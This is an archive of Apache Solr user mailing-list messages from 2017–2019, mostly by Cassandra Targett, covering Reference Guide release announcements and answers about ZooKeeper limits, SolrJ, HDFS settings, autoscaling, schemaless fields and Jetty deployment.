https://lucene.apache.org/solr/guide/8_1/.

Regards,
The Lucene PMC


[ANNOUNCE] Apache Solr Reference Guide for 8.0 released

2019-06-10 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide for 8.0
is available.

This 1,452 page PDF is the definitive guide to Apache Solr, the search
server built on Apache Lucene.

The PDF can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-8.0.pdf

The Guide is also available online, at
http://lucene.apache.org/solr/guide/8_0/.

While the Guide for 8.0 was delayed quite a bit after the release of 8.0
binaries, we don't anticipate the same delay for the 8.1 Guide, and are
working to make it available as soon as possible.

Regards,
The Lucene PMC


Re: Documentation for Apache Solr 8.0.0?

2019-04-03 Thread Cassandra Targett
The *DRAFT* 8.0 Guide is also available from Jenkins:

https://builds.apache.org/view/L/view/Lucene/job/Solr-reference-guide-8.0/javadoc/

Cassandra
On Apr 2, 2019, 3:23 AM -0500, Jan Høydahl , wrote:
> There is also a *DRAFT* HTML version of the to-be 8.1 guide built by Jenkins, 
> see
> https://builds.apache.org/view/L/view/Lucene/job/Solr-reference-guide-8.x/javadoc/
>  
> 
> It may serve as a place to read up while waiting for the 8,0 guide, as they 
> are almost identical still.
>
> --
> Jan Høydahl, search solution architect
> Cominvent AS - www.cominvent.com
>
> > 1. apr. 2019 kl. 16:11 skrev Jason Gerlowski :
> >
> > The Solr Reference Guide (of which the online documentation is a part)
> > gets built and released separately from the Solr distribution itself.
> > The Solr community tries to keep the code and documentation releases
> > as close together as we can, but the releases require work and are
> > done on a volunteer basis. No one has volunteered for the 8.0.0
> > reference-guide release yet, but I suspect a volunteer will come
> > forward soon.
> >
> > In the meantime though, there is documentation for Solr 8.0.0
> > available. Solr's documentation is included alongside the code. You
> > can checkout Solr and build the documentation yourself by moving to
> > "solr/solr-ref-guide" and running the command "ant clean default" from
> > that directory. This will build the same HTML pages you're used to
> > seeing at lucene.apache.org/solr/guide, and you can open the local
> > copies in your browser and browse them as you normally would.
> >
> > Alternatively, the Solr mirror on Github does its best to preview the
> > documentation. It doesn't display perfectly, but it might be helpful
> > for tiding you over until the official documentation is available, if
> > you're unwilling or unable to build the documentation site locally:
> > https://github.com/apache/lucene-solr/blob/branch_8_0/solr/solr-ref-guide/src/index.adoc
> >
> > Hope that helps,
> >
> > Jason
> >
> > On Mon, Apr 1, 2019 at 7:34 AM Yoann Moulin  wrote:
> > >
> > > Hello,
> > >
> > > I’m looking for the documentation for the latest release of SolR (8.0) 
> > > but it looks like it’s not online yet.
> > >
> > > https://lucene.apache.org/solr/news.html
> > >
> > > http://lucene.apache.org/solr/guide/
> > >
> > > Do you know when it will be available?
> > >
> > > Best regards.
> > >
> > > --
> > > Yoann Moulin
> > > EPFL IC-IT
>


ANNOUNCE: Solr Reference Guide for 7.6 released

2018-12-20 Thread Cassandra Targett
The Lucene PMC is pleased to announced that the Solr Reference Guide for
7.6 is now available.

This 1,415 page PDF is the definitive guide to Apache Solr, the search
server built on Apache Lucene.

The PDF can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-7.6.pdf

The Guide is also available online, at
https://lucene.apache.org/solr/guide/7_6.

Regards,
The Lucene PMC


Re: Error when loading configset

2018-12-04 Thread Cassandra Targett
It’s also documented in the Solr Ref Guide:

https://lucene.apache.org/solr/guide/7_5/setting-up-an-external-zookeeper-ensemble.html#increasing-the-file-size-limit
 


Even if you aren’t on 7.5, the instructions will work for earlier versions 
since those params have been in ZK forever.

Cassandra

> On Dec 4, 2018, at 6:38 PM, Edward Ribeiro  wrote:
> 
> By the default, ZooKeeper's znode maximum size limit is 1MB. If you try to
> send more than this then an error  occurs. You can increase this size limit
> but it has to be done both on server (ZK) and client (Solr) side. See this
> discussion for more details:
> 
> http://lucene.472066.n3.nabble.com/How-to-store-files-larger-than-zNode-limit-td4379893.html
> 
> Regards,
> Edward
> 
> Em ter, 4 de dez de 2018 20:39,  
>> Hi all,
>> i'm experiencing a problem when uploading a new configset on a Solr 7.5
>> instance running in cloud mode.
>> 
>> The problem seems to be related to the synonyms.txt file size: if >
>> 1,5 M Solr returns an error:
>> 
>>  adding: synonyms.txt (deflated 76%)
>> {
>>  "responseHeader":{
>>"status":500,
>>"QTime":24325},
>>  "error":{
>>"msg":"KeeperErrorCode = ConnectionLoss for
>> /configs/pvee/synonyms.txt",
>> 
>> 
>> Since my file size is about 6M how can i amend this problem?
>> 
>> Regards
>> 
>> 



Re: Documentation on SolrJ

2018-11-30 Thread Cassandra Targett
Support for the JSON Facet API in SolrJ was very recently committed via 
https://issues.apache.org/jira/browse/SOLR-12965 
. This missed the cut-off for 
7.6 but will be included in 7.7 (if there is one) and/or 8.0. You may be able 
to use the patch there to see if there are gaps or bugs that could be fixed 
before 7.7 / 8.0.

Jason, who did the work on that issue, also presented on SolrJ at the Activate 
conference, you may find it interesting:
https://www.youtube.com/watch?v=ACPUR_GL5zM 


If you do find the time to write some docs, I’d be happy to give you some 
editing help. Just open a Jira issue when/if you’ve got something and we can go 
from there.

> On Nov 30, 2018, at 9:53 AM, Thomas L. Redman  wrote:
> 
> Hi Shawn, thanks for the prompt reply!
> 
>> On Nov 29, 2018, at 4:55 PM, Shawn Heisey  wrote:
>> 
>> On 11/29/2018 2:01 PM, Thomas L. Redman wrote:
>>> Hi! I am wanting to do nested facets/Grouping/Expand-Collapse using SolrJ, 
>>> and I can find no API for that. I see I can add a pivot field, I guess to a 
>>> query in general, but that doesn’t seem to work at all, I get an NPE. The 
>>> documentation on SolrJ is sorely lacking, the documentation I have found is 
>>> less than a readme. Are there any books that provided a good tretise on 
>>> SolrJ specifically? Does SolrJ support these more advanced features?
>> 
>> I don't have any specific details for that use case.
> 
> Check out page 498 of the PDF, that includes a brief but powerful discussion 
> of the JSON Facet API. For just one example, I am interested in faceting a 
> nominal field within a date range bucket. Example: I want to facet 
> publication_date field into YEAR buckets, and within each YEAR bucket, facet 
> on author to get the most prolific authors in that year, AND to also facet 
> genre with the same bucket to find out how much scifi, adventure and so on 
> was produced that year. From what I am seeing, beyond pivots(and pivots won’t 
> support this specific use case), I don’t see this capability is supported by 
> the SolrJ API, but this is a hugely powerful feature, and needs to be 
> supported.
> 
> Furthermore, I want to be able to support a vaste range of facets within a 
> single query, perhaps including some collapse and expand, groupings and so on.
> 
>> 
>> If you share the code that gives you NPE, somebody might be able to help you 
>> get it working.
> 
> I haven’t looked in to this enough to drop it in somebody elses' lap at this 
> point, I suspect I am not using the API correctly. And since this won’t allow 
> what I want, I’m not too worried about it.
> 
>> 
>> The best place to find documentation for SolrJ is actually SolrJ itself -- 
>> the javadocs.  Much of that can be accessed pretty easily if you are using 
>> an IDE to do your development.  Here is a link to the top level of the SolrJ 
>> javadocs:
>> 
>> https://lucene.apache.org/solr/7_5_0/solr-solrj/index.html 
>> 
> 
> The JavaDocs are limited. I surmise from tracing the code a bit though that I 
> need to rely less on methods provided directly by SolrQuery, and add 
> parameters using methods of the superclasses more frequently. Those 
> superclass methods add simply key value pairs. Still not sure this will allow 
> me the flexibility I need, particularly if the JSON Facet API is not 
> supported.
> 
>> 
>> There's some documentation here, in the official reference guide:
>> 
>> https://lucene.apache.org/solr/guide/7_5/using-solrj.html 
>> 
> 
> This is an excellent document. It would be wonderful if a document of this 
> caliber was provided solely for SolrJ in the form of a tutorial. The existing 
> online tutorial says nothing about how to do anything beyond a simple query. 
> I notice in this document most of the examples of how to issue queries, for 
> example, use curl to issue query. Simply put, this is not a practical 
> approach for the typical user. That being the case, people need to build real 
> UIs around applications that hide the intricacies of the search API. I would 
> rather not build my own API, since SolrJ is already in place, and seems quite 
> powerful. I have been using it for a few years, but really just to do queries.
> 
> I might be interested in contributing to such a document, provided it is 
> sufficiently succinct. I find myself quite busy these days. But I think I 
> would really have to ramp up my understanding of SolrJ to be of any use. Is 
> there any such document in the works, or any interested parties? I am NOT a 
> good writer, I would need somebody to review my work for both accuracy and 
> grammar.
> 
> Also, if the JSON API supported by SolrJ, or is there any plan to support?



[ANNOUNCE] Solr Reference Guide for 7.5 released

2018-09-24 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide for
Solr 7.5 is now available.

This 1,389 page PDF is the definitive guide to Apache Solr, the search
server built on Apache Lucene.

The PDF can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-7.5.pdf

The Guide is also available online, at
https://lucene.apache.org/solr/guide/7_5.

Regards,
Lucene PMC


Re: Solr Stale pages

2018-08-30 Thread Cassandra Targett
As Jan pointed out, unless your client sends Solr some instructions for
what to do with those documents specifically, Solr doesn't do anything.

In your example, Nutch crawls 30 documents at first, and 30 documents are
sent to Solr and added to the index. On next crawl, it finds 27 documents,
and 27 documents are sent to Solr. If these documents have the same unique
keys (IDs) as 27 documents already in the index, the documents in the index
will be updated (someone can correct me on this, but I believe these IDs
get updated even if the content itself has not changed).

Unless Nutch (or any other client) specifically tells Solr to do something
with the 3 documents that were not sent as part of this second update, Solr
does nothing with regard to those documents. Which makes sense, you don't
want Solr just deleting documents because you didn't happen to update them
with every indexing request.

Solr maintains no record of where a document came from, what client sent
it, nor whether subsequent updates from the same client update or do not
update the same set of documents as previous requests from the same client.
It is up to the client process itself to keep track of this, and send Solr
details of what to do with subsequent update requests. In this case, what
you want is for Nutch to send Solr a delete by ID request for those 3
documents so they are removed. I'm not sure if Nutch is capable of doing
that, however.

On Thu, Aug 30, 2018 at 7:00 AM kunhu0...@gmail.com 
wrote:

> Thanks for the update
>
> I'm using Nutch 1.14 and Solr 6.6.3 and Zookeeper 3.4.12. We are using two
> Solr and configured as Solr cloud. Please let me know if anything is
> missing
>
>
>
> --
> Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html
>


[ANNOUNCE] Solr Reference Guide for 7.4 released

2018-06-28 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide for Solr
 7.4 is now available.

This 1,258 page PDF is the definitive guide to using Apache Solr, the
search server built on Apache Lucene.

The PDF Guide can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-
guide-7.4.pdf

It is also available online at https://lucene.apache.org/solr/guide/7_4.


Re: Solr start script

2018-06-07 Thread Cassandra Targett
The reason why you pass the DirectoryFactory at startup is so every
collection/core that's created is automatically stored in HDFS before
solrconfig.xml is read to know that's where they should be stored.

If you prefer to only store certain collections/cores in HDFS, you would
only set those properties in the solrconfig.xml files for the collection.

The properties do still need to be defined in solrconfig.xml, which the
documentation you pointed to says - make the change in solrconfig.xml, then
pass the properties at startup.

On Thu, Jun 7, 2018 at 9:25 AM Greenhorn Techie 
wrote:

> Shawn, Thanks for your response. Please find my follow-up questions:
>
> 1. My understanding is that Directory Factory settings are typically at a
> collection / core level. If thats the case, what is the advantage of
> passing it along with the start script?
> 2. In your below response, did you mean that even though I pass the
> settings as part of start script, they dont have any value unless they are
> mentioned as part of the solrconfig.xml file?
> 3. As per my previous email, what does Solr do if my solfconfig.xml contain
> NRTDirectoryFactory setting while the solr script is started with HDFS
> settings?
>
> Thanks
>
>
> On 7 June 2018 at 15:08:02, Shawn Heisey (apa...@elyograg.org) wrote:
>
> On 6/7/2018 7:37 AM, Greenhorn Techie wrote:
> > When the above settings are passed as part of start script, does that
> mean
> > whenever a new collection is created, Solr is going to store the indexes
> in
> > HDFS? But what if I upload my solrconfig.xml to ZK which contradicts with
> > this and contains NRTDirectoryFactory setting? Given the above start
> > script, should / could I skip the directory factory setting section in my
> > solrconfig.xml with the assumption that the collections are going to be
> > stored on HDFS *by default*?
>
> Those commandline options are Java system properties.  It looks like the
> example configs DO have settings in them that would use the
> solr.directoryFactory and solr.lock.type properties.  But if your
> solrconfig.xml file doesn't reference those properties, then they
> wouldn't make any difference.  The last one is probably a setting that
> HdfsDirectoryFactory uses that doesn't need to be explicitly referenced
> in a config file.
>
> Thanks,
> Shawn
>


Re: HDP Search - Configuration & Data Directories

2018-06-07 Thread Cassandra Targett
The documentation for HDP Search is online (and included in the package
actually). This page has the descriptions for the Ambari parameters:
https://doc.lucidworks.com/lucidworks-hdpsearch/3.0.0/Guide-Install-Ambari.html
.

HDP Search is a package developed by Lucidworks but distributed by
Hortonworks, so Shawn is right, you should go through them for further
questions.

On Thu, Jun 7, 2018 at 8:39 AM Greenhorn Techie 
wrote:

> Thanks Shawn. Will check with Hortonworks!
>
>
> On 7 June 2018 at 14:19:43, Shawn Heisey (apa...@elyograg.org) wrote:
>
> On 6/7/2018 6:35 AM, Greenhorn Techie wrote:
> > A quick question on configuring Solr with Hortonworks HDP. I have
> installed
> > HDP and then installed HDP Search using the steps described under the
> link
>
> 
>
> > - Within the various Solr config settings on Ambari, I am a bit confused
> > on the role of "solr_config_conf_dir" parameter. At the moment, it only
> > contains log4j.properties file. As HDPSearch is mainly meant to be used
> > with SolrCloud, wondering what is the significance of this directory as
> the
> > configurations are always maintained on ZooKeeper.
>
> The text strings "solr_config_conf_dir" and "solr_config_data_dir" do
> not appear anywhere in the Lucene/Solr source code, even if I use a
> case-insensitive grep. Which must mean that it is specific to the
> third-party software you are using.  You'll need to ask your question to
> the people who make that third-party software.
>
> The log4j config is not in zookeeper.  That will be found on each
> server.  That file configures the logging framework at the JVM level, it
> is not specifically for Solr.
>
> Thanks,
> Shawn
>


Re: BlendedInfixSuggester wiki errata corrige

2018-06-06 Thread Cassandra Targett
Solr's documentation is now integrated with Lucene/Solr source code, so can
be edited by anyone who is willing or able to submit a patch for it. In
your case, you could integrate these edits with the code changes you're
making for the JIRA issues you reference and include them with the patches
you're working on. I would be happy to review your suggested edits as part
of those patches - I can give you feedback on the doc changes while
ignoring the code changes, which in this case I know nothing about.

If I may, could I suggest we not call Solr's official documentation a
"wiki"? It used to be a wiki, 5 years ago, and then we shifted to a wiki
platform without the wiki features, but since last year it's really not a
wiki at all - it's not a collaborative platform and it's not open for
anyone to edit. It's just the documentation, with edits made via commits to
Lucene/Solr source code in the same way as any code change.

- Cassandra

On Tue, Jun 5, 2018 at 10:06 AM Alessandro Benedetti 
wrote:

> Errata corrige to my Errata corrige post :
>
> e.g.
>
> Position Of First match =   *0 |  1  | 2  | 3 |*
> Linear |1 | 0.9|0.8|0.7
> Reciprocal   |1 | 1/2|1/3|1/4
> Exponential Reciprocal |1 | 1/4|*1/9*|1/16
>
>
>
> -
> ---
> Alessandro Benedetti
> Search Consultant, R Software Engineer, Director
> Sease Ltd. - www.sease.io
> --
> Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html
>


Re: Index protected zip

2018-05-29 Thread Cassandra Targett
Someone needs to update the Ref Guide. That can be a patch submitted on a
JIRA issue, or a committer could forego a patch and make changes directly
with commits.

Otherwise, this wiki page is making a bad situation even worse.

On Tue, May 29, 2018 at 12:06 PM Tim Allison  wrote:

> I’m happy to contribute to this message in any way I can.  Let me know how
> I can help.
>
> On Tue, May 29, 2018 at 2:31 PM Cassandra Targett 
> wrote:
>
> > It's not as simple as a banner. Information was added to the wiki that
> does
> > not exist in the Ref Guide.
> >
> > Before you say "go look at the Ref Guide" you need to make sure it says
> > what you want it to say, and the creation of this page just 3 days ago
> > indicates to me that the Ref Guide is missing something.
> >
> > On Tue, May 29, 2018 at 1:04 PM Erick Erickson 
> > wrote:
> >
> > > On further reflection ,+1 to marking the Wiki page superseded by the
> > > reference guide. I'd be fine with putting a banner at the top of all
> > > the Wiki pages saying "check the Solr reference guide first" ;)
> > >
> > > On Tue, May 29, 2018 at 10:59 AM, Cassandra Targett
> > >  wrote:
> > > > Couldn't the same information on that page be put into the Solr Ref
> > > Guide?
> > > >
> > > > I mean, if that's what we recommend, it should be documented
> officially
> > > > that it's what we recommend.
> > > >
> > > > I mean, is anyone surprised people keep stumbling over this? Shawn's
> > wiki
> > > > page doesn't point to the Ref Guide (instead pointing at other wiki
> > pages
> > > > that are out of date) and the Ref Guide doesn't point to that page.
> So
> > > half
> > > > the info is in our "official" place but the real story is in another
> > > place,
> > > > one we alternately tell people to sometimes ignore but sometimes keep
> > up
> > > to
> > > > date? Even I'm confused.
> > > >
> > > > On Sat, May 26, 2018 at 6:41 PM Erick Erickson <
> > erickerick...@gmail.com>
> > > > wrote:
> > > >
> > > >> Thanks! now I can just record the URL and then paste it in ;)
> > > >>
> > > >> Who knows, maybe people will see it first too!
> > > >>
> > > >> On Sat, May 26, 2018 at 9:48 AM, Tim Allison 
> > > wrote:
> > > >> > W00t! Thank you, Shawn!
> > > >> >
> > > >> > The "don't use ERH in production" response comes up frequently
> > enough
> > > >> >> that I have created a wiki page we can use for responses:
> > > >> >>
> > > >> >> https://wiki.apache.org/solr/RecommendCustomIndexingWithTika
> > > >> >>
> > > >> >> Tim, you are extremely well-qualified to expand and correct this
> > > page.
> > > >> >> Erick may be interested in making adjustments also. The flow of
> the
> > > page
> > > >> >> feels a little bit awkward to me, but I'm not sure how to improve
> > it.
> > > >> >>
> > > >> >> If the page name is substandard, feel free to rename.  I've
> already
> > > >> >> renamed it once!  I searched for an existing page like this
> before
> > I
> > > >> >> started creating it.  I did put a link to the new page on the
> > > >> >> ExtractingRequestHandler page.
> > > >> >>
> > > >> >> Thanks,
> > > >> >> Shawn
> > > >> >>
> > > >> >>
> > > >>
> > >
> >
>


Re: Index protected zip

2018-05-29 Thread Cassandra Targett
It's not as simple as a banner. Information was added to the wiki that does
not exist in the Ref Guide.

Before you say "go look at the Ref Guide" you need to make sure it says
what you want it to say, and the creation of this page just 3 days ago
indicates to me that the Ref Guide is missing something.

On Tue, May 29, 2018 at 1:04 PM Erick Erickson 
wrote:

> On further reflection ,+1 to marking the Wiki page superseded by the
> reference guide. I'd be fine with putting a banner at the top of all
> the Wiki pages saying "check the Solr reference guide first" ;)
>
> On Tue, May 29, 2018 at 10:59 AM, Cassandra Targett
>  wrote:
> > Couldn't the same information on that page be put into the Solr Ref
> Guide?
> >
> > I mean, if that's what we recommend, it should be documented officially
> > that it's what we recommend.
> >
> > I mean, is anyone surprised people keep stumbling over this? Shawn's wiki
> > page doesn't point to the Ref Guide (instead pointing at other wiki pages
> > that are out of date) and the Ref Guide doesn't point to that page. So
> half
> > the info is in our "official" place but the real story is in another
> place,
> > one we alternately tell people to sometimes ignore but sometimes keep up
> to
> > date? Even I'm confused.
> >
> > On Sat, May 26, 2018 at 6:41 PM Erick Erickson 
> > wrote:
> >
> >> Thanks! now I can just record the URL and then paste it in ;)
> >>
> >> Who knows, maybe people will see it first too!
> >>
> >> On Sat, May 26, 2018 at 9:48 AM, Tim Allison 
> wrote:
> >> > W00t! Thank you, Shawn!
> >> >
> >> > The "don't use ERH in production" response comes up frequently enough
> >> >> that I have created a wiki page we can use for responses:
> >> >>
> >> >> https://wiki.apache.org/solr/RecommendCustomIndexingWithTika
> >> >>
> >> >> Tim, you are extremely well-qualified to expand and correct this
> page.
> >> >> Erick may be interested in making adjustments also. The flow of the
> page
> >> >> feels a little bit awkward to me, but I'm not sure how to improve it.
> >> >>
> >> >> If the page name is substandard, feel free to rename.  I've already
> >> >> renamed it once!  I searched for an existing page like this before I
> >> >> started creating it.  I did put a link to the new page on the
> >> >> ExtractingRequestHandler page.
> >> >>
> >> >> Thanks,
> >> >> Shawn
> >> >>
> >> >>
> >>
>


Re: Index protected zip

2018-05-29 Thread Cassandra Targett
Couldn't the same information on that page be put into the Solr Ref Guide?

I mean, if that's what we recommend, it should be documented officially
that it's what we recommend.

I mean, is anyone surprised people keep stumbling over this? Shawn's wiki
page doesn't point to the Ref Guide (instead pointing at other wiki pages
that are out of date) and the Ref Guide doesn't point to that page. So half
the info is in our "official" place but the real story is in another place,
one we alternately tell people to sometimes ignore but sometimes keep up to
date? Even I'm confused.

On Sat, May 26, 2018 at 6:41 PM Erick Erickson 
wrote:

> Thanks! now I can just record the URL and then paste it in ;)
>
> Who knows, maybe people will see it first too!
>
> On Sat, May 26, 2018 at 9:48 AM, Tim Allison  wrote:
> > W00t! Thank you, Shawn!
> >
> > The "don't use ERH in production" response comes up frequently enough
> >> that I have created a wiki page we can use for responses:
> >>
> >> https://wiki.apache.org/solr/RecommendCustomIndexingWithTika
> >>
> >> Tim, you are extremely well-qualified to expand and correct this page.
> >> Erick may be interested in making adjustments also. The flow of the page
> >> feels a little bit awkward to me, but I'm not sure how to improve it.
> >>
> >> If the page name is substandard, feel free to rename.  I've already
> >> renamed it once!  I searched for an existing page like this before I
> >> started creating it.  I did put a link to the new page on the
> >> ExtractingRequestHandler page.
> >>
> >> Thanks,
> >> Shawn
> >>
> >>
>


[ANNOUNCE] Solr Reference Guide for Solr 7.3 released

2018-04-05 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide for
Solr 7.3 is now available.

This 1,295 page PDF is the definitive guide to using Apache Solr, the
search server built on Apache Lucene.

The PDF Guide can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-7.3.pdf

It is also available online at https://lucene.apache.org/solr/guide/7_3.


Re: FW: Question about Overseer calling SPLITSHARD collection API command during autoscaling

2018-03-15 Thread Cassandra Targett
Hi Matthew -

It's cool to hear you're using the new autoscaling features.

To answer your first question, SPLITSHARD as an action for autoscaling is
not yet supported. As for when it might be, it's the next big gap to fill
in the autoscaling functionality, but there is some work to do first to
make splitting shards faster and safer overall. So, I hope we'll see it in
7.4, but there's a chance it won't be ready until the release after (7.5,
I'd assume).

AFAICT, there isn't a JIRA issue specifically for the SPLITSHARD support
yet, but there will be one relatively soon. There's an umbrella issue for a
many of the open tasks if you're interested in that:
https://issues.apache.org/jira/browse/SOLR-9735 (although, it's not an
exhaustive roadmap, I don't think).

I think for the time being if you want/need to split a shard, you'd still
need to do it manually.

Hope this helps -
Cassandra

On Thu, Mar 15, 2018 at 11:41 AM, Matthew Faw 
wrote:

> I sent this a few mins ago, but wasn’t yet subscribed.  Forwarding the
> message along to make sure it’s received!
>
> From: Matthew Faw 
> Date: Thursday, March 15, 2018 at 12:28 PM
> To: "solr-user@lucene.apache.org" 
> Cc: Matthew Faw , Alex Meijer <
> alex.mei...@verato.com>
> Subject: Question about Overseer calling SPLITSHARD collection API command
> during autoscaling
>
> Hi,
>
> So I’ve been trying out the new autoscaling features in solr 7.2.1.  I run
> the following commands when creating my solr cluster:
>
>
> Set up overseer role:
> curl -s "solr-service-core:8983/solr/admin/collections?action=
> ADDROLE=overseer=$thenode"
>
> Create cluster prefs:
> clusterprefs=$(cat <<-EOF
> {
> "set-cluster-preferences" : [
>   {"minimize":"sysLoadAvg"},
>   {"minimize":"cores"}
>   ]
> }
> EOF
> )
> echo "The cluster prefs request body is: $clusterprefs"
> curl -H "Content-Type: application/json" -X POST -d
> "$clusterprefs" solr-service-core:8983/api/cluster/autoscaling
>
> Cluster policy:
> clusterpolicy=$(cat <<-EOF
> {
> "set-cluster-policy": [
>   {"replica": 0, "nodeRole": "overseer"},
>   {"replica": "<2", "shard": "#EACH", "node": "#ANY"},
>   {"cores": ">0", "node": "#ANY"},
>   {"cores": "<5", "node": "#ANY"},
>   {"replica": 0, "sysLoadAvg": ">80"}
>   ]
> }
> EOF
> )
> echo "The cluster policy is $clusterpolicy"
> curl -H "Content-Type: application/json" -X POST -d
> "$clusterpolicy" solr-service-core:8983/api/cluster/autoscaling
>
> nodeaddtrigger=$(cat <<-EOF
> {
>  "set-trigger": {
>   "name" : "node_added_trigger",
>   "event" : "nodeAdded",
>   "waitFor" : "1s"
>  }
> }
> EOF
> )
> echo "The node added trigger request: $nodeaddtrigger"
> curl -H "Content-Type: application/json" -X POST -d
> "$nodeaddtrigger" solr-service-core:8983/api/cluster/autoscaling
>
>
> I then create a collection with 2 shards and 3 replicas, under a set of
> nodes in an autoscaling group (initially 4, scales up to 10):
> curl -s "solr-service-core:8983/solr/admin/collections?action=
> CREATE=${COLLECTION_NAME}=${NUM_SHARDS}&
> replicationFactor=${NUM_REPLICAS}=${
> AUTO_ADD_REPLICAS}=${COLLECTION_NAME}&
> waitForFinalState=true"
>
>
> I’ve observed several autoscaling actions being performed – automatically
> re-adding replicas, and moving shards to nodes based on my cluster
> policy/prefs.  However, I have not observed a SPLITSHARD operation.  My
> question is:
> 1) should I expect the Overseer to be able to call the SPLITSHARD command,
> or is this feature not yet implemented?
> 2) If it is possible, do you have any recommendations as to how I might
> force this type of behavior to happen?
> 3) If it’s not implemented yet, when could I expect the feature to be
> available?
>
> If you need any more details, please let me know! Really excited about
> these new features.
>
> Thanks,
> Matthew
>
> The content of this email is intended solely for the individual or entity
> named above and access by anyone else is unauthorized. If you are not the
> intended recipient, any disclosure, copying, distribution, or use of the
> contents of this information is prohibited and may be unlawful. If you have
> received this electronic transmission in error, please reply immediately to
> the sender that you have received the message in error, and delete it.
> Thank you.
>


Re: What is creating certain fields?

2018-03-07 Thread Cassandra Targett
I'll guess you're using Solr 7.x and those fields in your schema were
created automatically?

As of Solr 7.0, the schemaless mode field guessing added a copyField rule
for any field that's guessed to be text to copy the first 256 characters to
a multivalued string field. The way it works is a field is created with the
type "text_general", and a copyField is then automatically created with the
dynamic field rule "*_str" to create the multivalued string field.

This came from https://issues.apache.org/jira/browse/SOLR-9526.

You can prohibit the behavior if you want to by removing the copyField rule
section. See the docs for where in the solrconfig.xml you will want to
edit:
https://lucene.apache.org/solr/guide/schemaless-mode.html#enable-field-class-guessing
.

Cassandra

On Wed, Mar 7, 2018 at 9:46 AM, Erick Erickson 
wrote:

> Maybe  a copyField is realizing the dynamic fields?
>
>
> On Wed, Mar 7, 2018 at 7:43 AM, David Hastings
>  wrote:
> > those are dynamic fields.
> >
> >> indexed="false" stored="false"/>
> >
> >
> > On Wed, Mar 7, 2018 at 12:43 AM, Keith Dopson 
> wrote:
> >
> >> My default query produces this:
> >>
> >> |  {
> >> "id":"44419",
> >> "date":["11/13/17 13:18"],
> >> "url":["http://www.someurl.com;],
> >> "title":["some title"],
> >> "content":["some indexed content..."],
> >> "date_str":["11/13/17 13:18"],
> >> "url_str":["http://www.someurl.com;],
> >> "title_str":["some title"],
> >> "_version_":1594211356390719488,
> >> "content_str":["some indexed content.."]
> >> },
> >>
> >>
> >> In my managed_schema file, I only have five populated fields,
> >>
> >> >> required="true" multiValued="false" />
> >>
> >> >> stored="true"/>
> >> >> stored="true"/>
> >> >> stored="true"/>
> >> >> stored="true"/>
> >>
> >> While other fields are declared, none of them are populated by my "post"
> >> command.
> >>
> >> My question is "Where are the x_str fields coming from?
> >> I.e., what is producing the
> >> |
> >> ||"date_str":["...
> >> "url_str":["...
> >> "title_str":["...
> >> "content_str":["...|
> >>
> >> entries?
> >>
> >> Thanks in advance.
> >> |
> >>
> >>
> >>
>


Re: Gentle reminder RE: Object not fetched because its identifier appears to be already in processing

2018-02-27 Thread Cassandra Targett
There is not enough information here for anyone to answer. You mention a
"below message", but there is no message that we can see. If it was in an
attachment to the mail, it got stripped by the mail server.

If you want a response, please provide in the body of the mail details such
as: the error message you see (with the full stack trace, if possible);
what you are trying to index; the version of Solr you are using; any custom
configurations you may have in place; and any other detail that might help
someone who doesn't have access to your system try to guess what might be
going wrong.

Cassandra

On Tue, Feb 27, 2018 at 8:08 AM, YELESWARAPU, VENKATA BHAN <
vyeleswar...@statestreet.com> wrote:

> *Information Classification: **ll*
>
> * Limited Access *
>
> If any of you experts could help, we would greatly appreciate it. Thank
> you.
>
>
>
> *From:* YELESWARAPU, VENKATA BHAN
> *Sent:* Friday, February 23, 2018 8:30 AM
> *To:* 'd...@lucene.apache.org' ; '
> solr-user@lucene.apache.org' 
> *Subject:* Object not fetched because its identifier appears to be
> already in processing
>
>
>
> *Information Classification: **ll** Limited Access*
>
> Dear Users,
>
>
>
> While indexing job is running we are seeing the below message for all the
> objects.
>
> Object not fetched because its identifier appears to be already in
> processing
>
>
>
> What is the issue and how to resolve this so that indexing can work. Could
> you please guide.
>
>
>
> Thank you,
>
> Dutt
>
>
>


ANNOUNCE: Apache Solr Reference Guide for 7.2 released

2017-12-23 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide for
Solr 7.2 is now available.

This 1,157-page PDF is the definitive guide to using Apache Solr, the
search server built on Lucene.

The PDF can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-7.2.pdf

It is also available online at https://lucene.apache.org/solr/guide/7_2.

Regards,
Cassandra


Re: solrcloud in production - Jetty vs tomcat

2017-12-13 Thread Cassandra Targett
That is an old recommendation. Since Solr 5, Solr is no longer a war and
Tomcat is not supported. With modern Solr, you have only the one choice of
going to production with Jetty and there are hundreds (thousands maybe?) of
Solr implementations that do so. Jetty is now considered an "implementation
detail" that you shouldn't need to worry about to effectively run Solr for
yourself or your organization.

For more information on the war change, see also
https://wiki.apache.org/solr/WhyNoWar.

On Wed, Dec 13, 2017 at 9:01 AM, Hari Baskar <
contacthar...@yahoo.com.invalid> wrote:

> We are setting up solrcloud 6.6 in production. In some blogs, I see that
> Jetty is not recommended in prod environment. Is that the case ? Any
> specific disadvantages of going with Jetty ?
>
> Sent from Yahoo Mail on Android


Re: indexing XML stored on HDFS

2017-12-08 Thread Cassandra Targett
Matthew,

The hadoop-solr project you mention would give you the ability to index
files in HDFS. It's a Job Jar, so you submit it to Hadoop with the params
you need and it processes the files and sends them to Solr. It might not be
the fastest thing in the world since it uses MapReduce but we (I work at
Lucidworks) do have a number of people using it.

However, you mention that you're already processing your files with Spark,
and you don't really need them in HDFS in the long run - have you seen the
Spark-Solr project at https://github.com/lucidworks/spark-solr/? It has an
RDD for indexing docs to Solr, so you would be able to get the files from
wherever they originate, transform them in Spark, and get them into Solr.
It might be a better solution for your existing workflow.

Hope it helps -
